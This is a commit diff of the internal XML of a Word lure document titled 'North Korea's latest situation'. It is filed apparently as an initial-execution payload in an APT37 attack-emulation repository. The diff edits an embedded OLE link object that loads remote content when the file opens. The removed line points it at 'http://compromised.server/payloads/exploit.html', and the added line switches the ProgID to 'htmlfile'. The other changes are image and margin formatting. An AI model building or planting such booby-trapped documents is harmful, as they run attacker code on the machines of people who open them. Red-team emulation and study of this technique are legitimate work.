<commit_message>
Feat : Modify NorthKorea's_latest_situation.docx
+ wrong documents uploaded
</commit_message>
<xml_diff>
--- a/APT37/Resources/Initial_Execution_Payloads/NorthKorea's_latest_situation.docx
+++ b/APT37/Resources/Initial_Execution_Payloads/NorthKorea's_latest_situation.docx
@@ -46,8 +46,9 @@
             </v:formulas>
             <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
             <o:lock v:ext="edit" aspectratio="t"/>
+            <v:textbox style="mso-next-textbox:#_x0000_s1026"/>
           </v:shape>
-          <o:OLEObject Type="Link" ProgID="http://compromised.server/payloads/exploit.html" ShapeID="_x0000_s1026" DrawAspect="Content" r:id="rId6" UpdateMode="OnCall">
+          <o:OLEObject Type="Link" ProgID="htmlfile" ShapeID="_x0000_s1026" DrawAspect="Content" r:id="rId6" UpdateMode="OnCall">
             <o:LinkType>EnhancedMetaFile</o:LinkType>
             <o:LockedField>false</o:LockedField>
             <o:FieldCodes>\f 0</o:FieldCodes>
@@ -55,37 +56,65 @@
         </w:pict>
       </w:r>
       <w:r>
-        <w:pict w14:anchorId="47C1F808">
-          <v:shapetype id="_x0000_t75" coordsize="21600,21600" o:spt="75" o:preferrelative="t" path="m@4@5l@4@11@9@11@9@5xe" filled="f" stroked="f">
-            <v:stroke joinstyle="miter"/>
-            <v:formulas>
-              <v:f eqn="if lineDrawn pixelLineWidth 0"/>
-              <v:f eqn="sum @0 1 0"/>
-              <v:f eqn="sum 0 0 @1"/>
-              <v:f eqn="prod @2 1 2"/>
-              <v:f eqn="prod @3 21600 pixelWidth"/>
-              <v:f eqn="prod @3 21600 pixelHeight"/>
-              <v:f eqn="sum @0 0 1"/>
-              <v:f eqn="prod @6 1 2"/>
-              <v:f eqn="prod @7 21600 pixelWidth"/>
-              <v:f eqn="sum @8 21600 0"/>
-              <v:f eqn="prod @7 21600 pixelHeight"/>
-              <v:f eqn="sum @10 21600 0"/>
-            </v:formulas>
-            <v:path o:extrusionok="f" gradientshapeok="t" o:connecttype="rect"/>
-            <o:lock v:ext="edit" aspectratio="t"/>
-          </v:shapetype>
-          <v:shape id="_x0000_i1029" type="#_x0000_t75" style="width:606.6pt;height:761.4pt">
-            <v:imagedata r:id="rId7" o:title="Untitled"/>
-          </v:shape>
-        </w:pict>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="ko-KR"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56505327" wp14:editId="1682DD85">
+            <wp:extent cx="7493153" cy="9401175"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="1" name="그림 1" descr="Untitled"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 11" descr="Untitled"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId7" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="7500538" cy="9410441"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
       </w:r>
       <w:bookmarkStart w:id="0" w:name="_GoBack"/>
       <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:sectPr>
       <w:pgSz w:w="12240" w:h="15840"/>
-      <w:pgMar w:top="0" w:right="0" w:bottom="0" w:left="0" w:header="720" w:footer="720" w:gutter="0"/>
+      <w:pgMar w:top="0" w:right="249" w:bottom="0" w:left="249" w:header="720" w:footer="720" w:gutter="0"/>
       <w:cols w:space="720"/>
       <w:docGrid w:linePitch="360"/>
     </w:sectPr>
@@ -570,7 +599,7 @@
     <w:link w:val="Char"/>
     <w:uiPriority w:val="99"/>
     <w:unhideWhenUsed/>
-    <w:rsid w:val="00007BD5"/>
+    <w:rsid w:val="00151476"/>
     <w:pPr>
       <w:tabs>
         <w:tab w:val="center" w:pos="4513"/>
@@ -584,7 +613,7 @@
     <w:basedOn w:val="a0"/>
     <w:link w:val="a3"/>
     <w:uiPriority w:val="99"/>
-    <w:rsid w:val="00007BD5"/>
+    <w:rsid w:val="00151476"/>
   </w:style>
   <w:style w:type="paragraph" w:styleId="a4">
     <w:name w:val="footer"/>
@@ -592,7 +621,7 @@
     <w:link w:val="Char0"/>
     <w:uiPriority w:val="99"/>
     <w:unhideWhenUsed/>
-    <w:rsid w:val="00007BD5"/>
+    <w:rsid w:val="00151476"/>
     <w:pPr>
       <w:tabs>
         <w:tab w:val="center" w:pos="4513"/>
@@ -606,7 +635,7 @@
     <w:basedOn w:val="a0"/>
     <w:link w:val="a4"/>
     <w:uiPriority w:val="99"/>
-    <w:rsid w:val="00007BD5"/>
+    <w:rsid w:val="00151476"/>
   </w:style>
 </w:styles>
 </file>

</xml_diff>